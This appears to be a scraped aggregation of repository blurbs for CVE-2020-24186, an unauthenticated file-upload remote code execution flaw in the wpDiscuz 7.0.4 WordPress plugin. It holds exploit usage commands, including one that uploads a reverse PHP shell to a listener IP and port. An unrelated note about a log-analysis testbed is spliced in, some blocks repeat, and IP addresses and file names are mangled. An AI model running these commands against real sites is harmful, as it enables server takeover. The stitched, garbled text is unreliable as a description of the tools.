CVE-2020-24186

wpDiscuz 7.0.4 Remote Code Execution

POC CVE-2020-24186-wpDiscuz-704-RCE WordPress wpDiscuz 704 Remote Code Execution A Remote Code Execution vulnerability exists in the gVectors wpDiscuz plugin 70 through 704 for WordPress, which allows unauthenticated users to upload any type of file, including PHP files via the wmuUploadFiles AJAX action Exploit Usage Commands: Windows/Linux: $ sudo python3 wpDiscuz_

wpDiscuz 7.0.4 Remote Code Execution

POC CVE-2020-24186-wpDiscuz-704-RCE WordPress wpDiscuz 704 Remote Code Execution A Remote Code Execution vulnerability exists in the gVectors wpDiscuz plugin 70 through 704 for WordPress, which allows unauthenticated users to upload any type of file, including PHP files via the wmuUploadFiles AJAX action Exploit Usage Commands: Windows/Linux: $ sudo python3 wpDiscuz_

Scripts to deploy virtual testbed for log data analysis and anomaly detection.

Kyoushi Testbed Environment This tool allows to generate labeled log datasets in simulation testbeds for security evaluations, eg, IDSs, alert aggregation, or federated learning The testbed simulates an enterprise IT network, involving mail servers, file share, firewall, intranet, DMZ, DNS, VPN, etc Log data is collected from many sources, including network traffic, apache

CVE-2020-24186的攻击脚本

CVE-2020-24186-exploit CVE-2020-24186的攻击脚本 Exp使用方法： Commands: Windows/Linux: python3 CVE-2020-24186py -u <Base_Host> -p <BlogPost_URL> Example： python3 CVE-2020-24186py -u 127001 -p /wordpress/2022/04/04/hello-world

WpDiscuz 7.0.4 Arbitrary File Upload Exploit

chmod +x CVE-2020-24186 /CVE-2020-24186

CVE-2020-24186 reverse shell upload Exploit for WpDiscuz 704 based on the the exploit written by h3v0x Exploits the vulnerability and uploads a reverse PHP shell Inspiration was the Blogger CTF exploitpy -u 192168181/blog -p /wordpress/2021/06/blogpost -l '19216819' -s 9001 Example use:

chmod +x CVE-2020-24186 /CVE-2020-24186